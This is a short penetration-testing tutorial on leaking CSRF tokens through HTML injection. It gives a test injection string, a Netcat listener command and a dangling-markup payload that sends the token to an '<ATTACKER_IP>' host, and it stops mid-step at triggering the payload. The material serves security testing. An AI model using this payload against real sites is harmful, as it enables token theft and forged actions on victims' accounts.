Cross-Site Request Forgery (CSRF) tokens are essential for protecting web applications from unauthorized actions. However, if an application is vulnerable to HTML injection or XSS, attackers can exploit these vulnerabilities to leak CSRF tokens. Understanding how to identify and exploit these weaknesses is crucial for penetration testers.
π Understanding CSRF Token Leakage
CSRF tokens are typically included in POST requests to validate that the request is legitimate. If an attacker can inject HTML into a page, they may be able to extract the CSRF token and use it for malicious purposes.
Key Characteristics of CSRF Token Leakage:
HTML Injection Vulnerabilities: If an application allows HTML injection, it can be exploited to leak sensitive information.
Remote Exploitation: This type of attack does not require the attacker to be on the same local network as the victim.
π§ͺ Testing for CSRF Token Leakage
To test for CSRF token leakage through HTML injection, follow these steps:
Log into the Target Application: Use valid credentials to access the application.
Identify HTML Injection Point: Navigate to a feature that reflects user input, such as the account deletion confirmation page. Attempt to inject HTML into the input field. For example:
<h1>h1<u>underline<%2fu><%2fh1>
Inspect the Source: Check the page source to confirm that your HTML injection was successful. You should see your injected HTML reflected in the source code.
Set Up a Listener: Use Netcat to listen for incoming connections on a specified port:
nc-nlvp8000
Craft the Payload: Create a payload that will send the CSRF token to your listening machine. For example:
<table%20background='%2f%2f<ATTACKER_IP>:PORT%2f
Trigger the Payload: While logged in as the victim, navigate to the URL that includes your crafted payload. For example: